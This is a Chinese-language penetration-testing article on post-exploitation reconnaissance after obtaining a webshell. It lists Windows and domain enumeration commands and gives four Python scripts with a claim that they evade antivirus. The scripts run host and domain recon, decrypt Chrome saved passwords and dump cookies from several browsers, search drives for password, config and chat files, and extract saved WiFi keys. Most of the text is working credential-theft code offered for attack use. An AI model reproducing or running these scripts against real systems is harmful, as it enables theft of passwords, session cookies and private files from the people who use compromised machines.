——D&X安全实验室
文中脚本已上传至github:https://github.com/Potato-py/getIntrInfo
可打包为可执行文件,可过360、火绒等
渗透的本质就是信息收集,信息收集的深度与广度以及对关键信息的提取,影响了后续的方向和手法。
当我们拿到webShell后,应该从内到外一步一步收集服务器信息、域信息以及环境信息等,从一个个细节中全面了解内网的部署。以下是总结的部分查询命令:
当前用户:
whoami /all
网络信息:
ipconfig /all
计算机版本/补丁编号:
systeminfo
进程列表:
tasklist
补丁信息:
wmic qfe
系统信息:
wmic os
机器运行信息:
net statistics workstation
系统架构:
set process
防火墙配置:
netsh firewall show config
日志修改权限:
wmic nteventlog get path,filename,writeable
当前在线用户:
quser
本地用户:
net user
本机管理员:
net localgroup administrators
已安装软件信息:
wmic product get name,version
杀软信息:
WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
端口信息:
netstat -ano
路由信息:
route print
arp信息:
arp -a
host信息:
type c:\Windows\system32\drivers\etc\hosts
wifi密码:
netsh wlan show profile
计划任务:
schtasks
自启服务:
wmic startup get command, caption
已启服务:
net start
本机服务:
wmic service list brief
DNS服务器:
nslookup
DNS缓存:
ipconfig /displaydns
当前域信息:
net config workstation
当前连接:
net use
当前映射:
net share
域环境:
net view
定位域控:
net group "domain controllers" /domain
域用户:
net user /domain
域用户详情:
wmic useraccount get /all
域用户密码策略:
net accounts /domain
本地用户组信息:
net localgroup
域用户组信息:
net group /domain
域用户组成员:
net "Domain users" /domain
域管理员用户组成员:
net group "Enterprise Admins" /domain
域信任信息:
nltest /domain_trusts
以下脚本可用于辅助获取:
import os,sys
import csv
cmdList={
    # Label -> shell command; main() runs them in dict order and stores
    # each output under its label.
    # NOTE(review): a dict literal keeps only the last value for a repeated
    # key, so "DNS服务器", "定位域控" and "域管理员用户组成员" each resolve to
    # their final entry below; the earlier commands for those labels never run.
    # host
    "当前用户":"whoami /all",
    "网络信息":"ipconfig /all",
    "计算机版本/补丁编号":"systeminfo",
    "进程列表":"tasklist",
    "补丁信息":"wmic qfe",
    "系统信息":"wmic os",
    "机器运行信息":"net statistics workstation",
    "系统架构":"set process",
    "防火墙配置":"netsh firewall show config",
    "日志修改权限":"wmic nteventlog get path,filename,writeable",
    "当前在线用户":"quser",
    "本地用户":"net user",
    "本机管理员":"net localgroup administrators",
    "已安装软件信息":"wmic product get name,version",
    # antivirus
    "杀软信息":r"WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe",
    # network
    "端口信息":"netstat -ano",
    "路由信息":"route print",
    "arp信息":"arp -a",
    "host信息":"type c:\Windows\system32\drivers\etc\hosts",
    "wifi密码":"netsh wlan show profile",
    # scheduled tasks
    "计划任务":"schtasks",
    # services
    "自启服务":"wmic startup get command, caption",
    "已启服务":"net start",
    "本机服务":"wmic service list brief",
    # DNS
    "DNS服务器":"nslookup",
    "DNS缓存":"ipconfig /displaydns",
    "DNS服务器":"nslookup",
    # domain
    "当前域信息":"net config workstation",
    "当前连接":"net use",
    "当前映射":"net share",
    "域环境":"net view",
    "定位域控":"net time",
    "定位域控":"net group \"domain controllers\" /domain",
    "域用户":"net user /domain",
    "域用户详情":"wmic useraccount get /all ",
    "域用户密码策略":"net accounts /domain",
    "本地用户组信息":"net localgroup",
    "域用户组信息":"net group /domain",
    "域用户组成员":"net \"Domain users\" /domain",
    "域管理员用户组成员":"net group \"Domain Admins\" /domain",
    "域管理员用户组成员":"net group \"Enterprise Admins\" /domain",
    "域信任信息":"nltest /domain_trusts",
}
choseList={}  # placeholder for a selective-run subset; nothing in this script reads it
def main():
    """Run every command in ``cmdList`` and record its output.

    Entries are numbered from 1 in dict order; each is echoed to stdout
    under a labelled banner and appended to the module-level
    ``csv_writer`` as ``[id, label, output]``.  A selective-run mode via
    ``choseList`` was planned but not implemented, so everything runs.
    """
    for seq, (label, command) in enumerate(cmdList.items(), start=1):
        print('\n\n-------------%s-------------' % label)
        output = os.popen(command).read()
        print(output)
        csv_writer.writerow([seq, label, output])
if __name__ == "__main__":
    # open() does not create directories: ./Result/ must already exist or
    # this raises FileNotFoundError before anything runs.
    filename='./Result/hostInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)  # module global consumed by main()
        csv_writer.writerow([ 'ID','类型', '信息'])
        main()
在我们内网渗透过程中没有头绪时,我们往往能通过一些出其不意的方式来获取一些渗透路径。
通过获取浏览器书签、记录等信息来获取更多未知可渗透网络,通过获取浏览器Cookie以及存储的账号密码来获取Web端权限。以下脚本可用于辅助获取:
import os,sys
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime, timedelta
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import browser_cookie3
import requests
import csv
#初始化地址
# Chrome profile file locations, chosen once at import time from sys.platform.
if 'win' in sys.platform:
    BookmarksPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Bookmarks') # saved bookmarks (JSON)
    localStatePath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Local State')# holds the wrapped AES key
    loginDataPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Login Data')# saved site credentials (SQLite)
    cookiesPath= os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies')# cookies (SQLite)
elif 'linux' in sys.platform:
    BookmarksPath = os.path.expanduser('~/.config/google-chrome/Default/Bookmarks')
    localStatePath = os.path.expanduser('~/.config/google-chrome/Local State')
    loginDataPath = os.path.expanduser('~/.config/chromium/Default/Login Data')
    cookiesPath = os.path.expanduser('~/.config/chromium/Default/Cookies')
else:  # macOS
    BookmarksPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Bookmarks')
    localStatePath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Local State')
    loginDataPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Login Data')
    cookiesPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Cookies')
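def getChromeTime(chromedate):  # convert a Chrome timestamp to text
    """Return *chromedate* (microseconds since 1601-01-01) as ``str(datetime)``.

    This is the timestamp format found in Chrome's SQLite tables
    (``date_last_used``, ``expires_utc``); e.g. ``86_400_000_000`` gives
    ``'1601-01-02 00:00:00'``.  Returns '' when the value is not a number
    or lies outside the representable datetime range.  Only those three
    error types are caught, so a KeyboardInterrupt or a programming error
    is no longer swallowed the way the bare ``except`` did.
    """
    try:
        return str(datetime(1601, 1, 1) + timedelta(microseconds=chromedate))
    except (TypeError, ValueError, OverflowError):
        return ''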
def getEncKey(): # fetch the profile's AES key
    """Return the AES key stored in ``localStatePath`` (Windows only).

    Reads ``os_crypt.encrypted_key`` from the Local State JSON, base64-decodes
    it, drops the first 5 bytes and unwraps the rest with ``win32crypt``
    for the current user.  Raises on a missing file or key.
    """
    with open(localStatePath, "r", encoding="utf-8") as f:
        localStateTest = f.read()
    localState = json.loads(localStateTest)
    key = base64.b64decode(localState["os_crypt"]["encrypted_key"])[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
#Chrome专属,可删除使用公用方法
def getDecCookie(encCookie): # decrypt one cookie blob
    """Decrypt an ``encrypted_value`` blob from Chrome's cookies table (Windows only).

    Dispatches on the blob prefix: the first branch hands the blob to
    ``dpapiDecrypt``; the ``v10`` branch hands it to ``aesDecrypt`` and drops
    the last 16 bytes.  Returns None if a ``WindowsError`` is raised during
    decryption; a blob matching neither prefix falls through and also
    yields None.  On any platform other than win32 raises ``WindowsError``.
    """
    if sys.platform == 'win32':
        try:
            if encCookie[:4] == b'x01x00x00x00':
                decCookie = dpapiDecrypt(encCookie)
                return decCookie.decode()
            elif encCookie[:3] == b'v10':
                decCookie = aesDecrypt(encCookie)
                return decCookie[:-16].decode()
        except WindowsError:
            return None
    else:
        raise WindowsError
#Chrome专属,可删除使用公用方法
def dpapiDecrypt(encCookie): # DPAPI via ctypes
    """Unprotect *encCookie* with crypt32 ``CryptUnprotectData`` and return the plaintext bytes.

    Raises ``ctypes.WinError()`` when the call reports failure.  The output
    buffer is copied out and released with ``LocalFree``.
    """
    import ctypes
    import ctypes.wintypes
    class DATA_BLOB(ctypes.Structure):
        # mirrors the Win32 DATA_BLOB {DWORD cbData; BYTE *pbData;}
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]
    p = ctypes.create_string_buffer(encCookie, len(encCookie))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result
#Chrome专属,可删除使用公用方法
def aesDecrypt(encCookie): # decrypt with the AES key
    """AES-GCM decrypt a ``v10`` cookie blob with the key from ``getEncKey``.

    Bytes 3..15 are used as the nonce and everything after byte 15 as
    ciphertext.  Only ``update`` is called, never ``finalize``, so the GCM
    tag is not verified here; the caller strips it by length.
    """
    key = getEncKey()
    nonce = encCookie[3:15]
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(encCookie[15:])
def decPassword(password, key): # decrypt a saved password
    """Decrypt a ``password_value`` blob from Chrome's ``logins`` table.

    Tries AES-GCM with *key* first (nonce at bytes 3..15, last 16 bytes
    dropped), then falls back to DPAPI via ``win32crypt``, and returns ""
    when both fail.  Both ``except`` clauses are bare, so every error
    (including a UnicodeDecodeError on the result) is swallowed.
    """
    try:
        iv = password[3:15]
        password = password[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return ""
def getPassword(): # dump saved logins
    """Write every saved login from ``loginDataPath`` to ``csv_writer``.

    Works on a copy of the SQLite file (``chromeLoginData.db`` in the
    working directory), reads ``logins`` ordered by ``date_created``,
    decrypts each password with ``decPassword`` and records rows that
    have a username or password.  The copy is deleted afterwards;
    removal errors are ignored.
    """
    csv_writer.writerow([ 'ID','【Chrome】url地址', '账号','密码','最后使用时间'])
    key = getEncKey()
    filename = "chromeLoginData.db"
    # copy first: a running Chrome keeps the original locked
    shutil.copyfile(loginDataPath, filename)
    db = sqlite3.connect(filename)
    db.text_factory = str
    cursor = db.cursor()
    cursor.execute("select origin_url, username_value, password_value, date_last_used from logins order by date_created")
    id=0
    for row in cursor.fetchall():
        url = row[0]
        username = row[1]
        password = decPassword(row[2], key)
        dateLastUsed = row[3]
        if username or password:
            id=id+1
            print("\nURL: "+url)
            print("Username: "+username)
            print("Password: "+password)
            print("Last Used: "+getChromeTime(dateLastUsed))
            csv_writer.writerow([ id, url, username,password,getChromeTime(dateLastUsed)])
        else:
            continue
    cursor.close()
    db.close()
    csv_writer.writerow(' ')  # blank spacer row
    try:
        os.remove(filename)
    except:
        pass
def formatCookiejar(cookiejar): # flatten a cookiejar into printed rows
    """Print and record each cookie of a browser_cookie3 jar.

    Operates on the text form: ``str(cookiejar)`` is trimmed by 12 leading
    and 3 trailing characters, split on ``">, <"``, and host, name and
    value are then cut out of each ``Cookie name=value for host`` chunk
    with ``split``.  Rows ``[id, host, name, cookie]`` go to ``csv_writer``.
    A jar whose repr does not have that shape raises IndexError.
    """
    cookieList = str(cookiejar)[12:-3].split(">, <")
    newCookieList=[]  # unused
    id=0
    for i in range(len(cookieList)):
        id=id+1
        host=cookieList[i].split(" for ")[1]
        name=cookieList[i].split("Cookie ")[1].split("=")[0]
        cookie=cookieList[i].split("=")[1].split(" for ")[0]
        print('\nHost: %s\nName: %s\nCookie: %s'%(host,name,cookie))
        csv_writer.writerow([ id, host, name, cookie])
def getCookie(): # cookies from every supported browser
    """Record cookies for Chrome, Firefox, Opera, Edge and Chromium via browser_cookie3.

    Chrome is handled first with ``getChromeCookie``; if that raises, the
    jar returned by ``browser_cookie3.chrome()`` is formatted instead, and
    if that fails too (including when the jar was never assigned) a
    "not detected" row is written.  The other browsers go straight to
    ``formatCookiejar``; any exception is treated as "browser not found".
    All ``except`` clauses are bare.
    """
    try:
        chromeCookie = browser_cookie3.chrome()
        print('\n\n-------------Chrome浏览器Cookie如下:-------------')
        getChromeCookie()
    except:
        try:
            # fallback: format the browser_cookie3 jar directly
            csv_writer.writerow([ 'ID','【Chrome】url地址', 'Name', 'Cookie'])
            formatCookiejar(chromeCookie)
            csv_writer.writerow(' ')
        except:
            chromeCookie = []
            csv_writer.writerow([ ' ','未检测到Chrome浏览器', ' ', ' '])
            csv_writer.writerow(' ')
            print('\n未检测到Chrome浏览器')
    try:
        firefoxCookie = browser_cookie3.firefox()
        csv_writer.writerow([ 'ID','【Firefox】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Firefox浏览器Cookie如下:-------------')
        formatCookiejar(firefoxCookie)
        csv_writer.writerow(' ')
    except:
        firefoxCookie = []
        csv_writer.writerow([ ' ','未检测到Firefox浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Firefox浏览器')
    try:
        operaCookie = browser_cookie3.opera()
        csv_writer.writerow([ 'ID','【Opera】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Opera浏览器Cookie如下:-------------')
        formatCookiejar(operaCookie)
        csv_writer.writerow(' ')
    except:
        operaCookie = []
        csv_writer.writerow([ ' ','未检测到Opera浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Opera浏览器')
    try:
        edgeCookie = browser_cookie3.edge()
        csv_writer.writerow([ 'ID','【Edge】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Edge浏览器Cookie如下:-------------')
        formatCookiejar(edgeCookie)
        csv_writer.writerow(' ')
    except:
        edgeCookie = []
        csv_writer.writerow([ ' ','未检测到Edge浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Edge浏览器')
    try:
        chromiumCookie = browser_cookie3.chromium()
        csv_writer.writerow([ 'ID','【Chromium】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Chromium浏览器Cookie如下:-------------')
        formatCookiejar(chromiumCookie)
        csv_writer.writerow(' ')
    except:
        chromiumCookie = []
        csv_writer.writerow([ ' ','未检测到Chromium浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Chromium浏览器')
#Chrome专属,可删除使用公用方法
def getChromeCookie(): # Chrome cookies straight from the SQLite file
    """Write Chrome's cookies table (``cookiesPath``) to ``csv_writer``.

    Works on a copy (``chromeCookieData.db``), reads host, path, name,
    encrypted value and expiry, and decrypts each value first with
    ``win32crypt`` and, if that raises, with ``getDecCookie``.  Any error
    while handling a row skips that row silently.  The copy is removed
    at the end; removal errors are ignored.
    """
    filename = "chromeCookieData.db"
    shutil.copyfile(cookiesPath, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    cursor.execute("select host_key,path,name,encrypted_value,expires_utc from cookies")# author's note: needs a recent sqlite3, older builds fail converting encrypted_value to utf-8
    csv_writer.writerow([ 'ID','【Chrome】url地址', 'Path', 'Name', 'Cookie', '有效期'])
    id=0
    for row in cursor.fetchall():
        try:
            host = row[0]
            path = row[1]
            name = row[2]
            encrypted_value = row[3]
            expires_utc =getChromeTime(row[4])
            if encrypted_value:
                id=id+1
                print("\nHost: "+host)
                print("Path: "+path)
                print("Name: "+name)
                try:
                    cookie=win32crypt.CryptUnprotectData(encrypted_value)[1].decode() # older (pre-80) storage format
                except Exception as e:
                    cookie=getDecCookie(encrypted_value) # Chrome 80+ storage format
                print("Cookie: "+cookie)
                print("Expires: "+expires_utc)
                csv_writer.writerow([ id, host, path, name, cookie, expires_utc])
        except:
            continue  # bare except: a bad row is dropped without a trace
    cursor.close()
    db.close()
    csv_writer.writerow(' ')
    try:
        os.remove(filename)
    except:
        pass
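def forBookmarks(itemData, id):  # walk bookmark nodes recursively
    """Print and record every URL bookmark under *itemData*.

    Args:
        itemData: list of Chrome bookmark nodes, each a dict with ``type``
            and ``name`` plus ``url`` (type ``'url'``) or ``children`` (folder).
        id: running row counter; the first URL found is numbered ``id + 1``.

    Returns:
        The counter after the last URL written.  Folder recursion now
        continues from this value; the original discarded it, so numbering
        restarted after every folder.

    Side effects: prints each bookmark and appends ``[id, name, url]`` to
    the module-level ``csv_writer``.
    """
    for item in itemData:
        kind = item['type']  # avoid shadowing builtin ``type``
        name = item['name']
        if kind == 'url':
            id += 1
            print('\nTitle: ', name, '\nUrl: ', item['url'])
            csv_writer.writerow([id, name, item['url']])
        else:  # folder: descend and keep the counter running
            id = forBookmarks(item['children'], id)
    return id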
def getBookmarks():  # export the bookmark bar
    """Write the Chrome bookmark bar from ``BookmarksPath`` to ``csv_writer``.

    Emits a header row, walks ``roots.bookmark_bar.children`` with
    ``forBookmarks`` starting the counter at 0, then a blank spacer row.
    """
    csv_writer.writerow(['ID', '【Chrome】书签名', 'url地址'])
    with open(BookmarksPath, 'r', encoding="utf-8") as f:
        roots = json.load(f)['roots']
    forBookmarks(roots['bookmark_bar']['children'], 0)
    csv_writer.writerow(' ')
def main():
    """Run the three collectors in order, each under a printed banner."""
    steps = (
        ('\n-------------Chrome浏览器书签如下:-------------', getBookmarks),
        ('\n\n-------------Chrome浏览器密码如下:-------------', getPassword),
        ('\n\n-------------各浏览器Cookie如下:-------------', getCookie),
    )
    for banner, collect in steps:
        print(banner)
        collect()
if __name__ == "__main__":
    # ./Result/ must already exist; open() will not create it.
    filename='./Result/bowserInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)  # module global used by every collector
        main()
通过遍历获取敏感文件,或者聊天文件,有可能存在Web控制台账号密码等敏感信息。以下脚本可用来辅助获取:
import os,sys
import csv
cmdList={
    # Label -> shell command (cmd.exe ``dir`` listings, some joined with ``&``).
    # The first three hard-code C:/Users/Administrator and return nothing for
    # any other profile.
    # NOTE(review): "密码文件" appears twice; a dict keeps only the last value,
    # so the "*pwd*" search is never run.
    "QQ文件":'dir /a /s /b "C:/Users/Administrator/Documents/Tencent Files/"|findstr "FileRecv.*\."',
    "微信文件":'dir /a /s /b "C:/Users/Administrator/Documents/WeChat Files/"|findstr "FileStorage.*\."',
    "下载文件":'dir /a /s /b "C:/Users/Administrator/Downloads"',
    "office数据库文件":'c: & dir /a /s /b "*.mdb" & d: & dir /a /s /b "*.mdb" & e: & dir /a /s /b "*.mdb"',
    "sql文件":'c: & dir /a /s /b "*.sql" & d: & dir /a /s /b "*.sql" & e: & dir /a /s /b "*.sql"',
    "虚拟光盘文件":'c: & dir /a /s /b "*.mdf" & d: & dir /a /s /b "*.mdf" & e: & dir /a /s /b "*.mdf"',
    "outlook电子邮件文件":'c: & dir /a /s /b "*.eml"',
    "outlook数据库文件":'c: & dir /a /s /b "*.pst"',
    "配置文件":'c: & dir /a /s /b "*.conf*" & d: & dir /a /s /b "*.conf*" & e: & dir /a /s /b "*.conf*"',
    "备份文件":'c: & dir /a /s /b "*bak*" & d: & dir /a /s /b "*bak*" & e: & dir /a /s /b "*bak*"',
    "密码文件":'c: & dir /a /s /b "*pwd*" & d: & dir /a /s /b "*pwd*" & e: & dir /a /s /b "*pwd*"',
    "密码文件":'c: & dir /a /s /b "*pass*" & d: & dir /a /s /b "*pass*" & e: & dir /a /s /b "*pass*"',
    #"登录文件":'c: & dir /a /s /b "*login*" & d: & dir /a /s /b "*login*" & e: & dir /a /s /b "*login*"',
    #"用户文件":'c: & dir /a /s /b "*user*" & d: & dir /a /s /b "*user*" & e: & dir /a /s /b "*user*"',
}
choseList={}  # placeholder for a selective-run subset; nothing in this script reads it
def main():
    """Run each ``cmdList`` search and record its listing.

    Every entry gets a 1-based id, a labelled banner on stdout, and a
    ``[id, label, output]`` row on the module-level ``csv_writer``.
    Selective execution via ``choseList`` was never implemented, so all
    entries run; the author notes the first run is slow, which is expected.
    """
    counter = 0
    for label, command in cmdList.items():
        counter += 1
        print('\n\n-------------%s-------------' % label)
        listing = os.popen(command).read()
        print(listing)
        csv_writer.writerow([counter, label, listing])
#可以添加选择性读取某文件---我有。懒
if __name__ == "__main__":
    # ./Result/ must already exist; open() will not create it.
    filename='./Result/sensitiveFile.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)  # module global consumed by main()
        csv_writer.writerow([ 'ID','类型', '路径'])
        main()
通过获取Wifi账号密码,获得足够多的密码样本来分析密码设置方式和使用习惯,从而进行针对性的攻击利用。以下脚本可用来辅助获取:
import os
import importlib,sys
import csv
importlib.reload(sys)  # appears to be a Python 2 leftover (reload-for-setdefaultencoding); nothing below depends on it
# 获取电脑连接过的所有wifi名称和密码
def checkWIFI():
    """Return ``[[profile_name, key], ...]`` for saved WLAN profiles (Windows only).

    Runs ``netsh wlan show profiles`` and then one ``netsh ... key=clear``
    call per profile, keeping profiles whose key line is non-empty.  The
    parsing matches the Chinese-locale netsh labels at fixed offsets
    (11 and 18 characters), so on a system whose netsh prints another
    language nothing matches and the result is an empty list.
    """
    list = []  # shadows the builtin ``list``; harmless here
    # one line per saved profile
    message = os.popen('netsh wlan show profiles').readlines()
    print('正在解析中,请稍等……')
    for i in message:
        result = i.strip().encode().decode("utf-8")  # encode/decode round-trip is a no-op
        if result.find(u"所有用户配置文件 : ") != -1:
            # NOTE(review): the profile name is spliced into a shell string, so
            # unusual characters in it reach os.popen unescaped.
            command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
            try:
                per_wifi = os.popen(command).readlines()
            except:
                per_wifi = []
            for j in per_wifi:
                passwd = j.strip().encode().decode("utf-8")
                if passwd.find(u"关键内容 :") != -1:  # key line; kept only when non-empty
                    if passwd[18:] != '':
                        list_temp = []
                        list_temp.append(result[11:])
                        list_temp.append(passwd[18:])
                        list.append(list_temp)
    return list
if __name__ == "__main__":
    list = checkWIFI()  # shadows the builtin ``list`` at module level
    print("返回结果如下:")
    # ./Result/ must already exist; open() will not create it.
    filename='./Result/conWifiInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','wifi名称', '密码'])
        i = 0
        for j in list:
            i = i + 1
            print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
            csv_writer.writerow([ i, j[0], j[1]])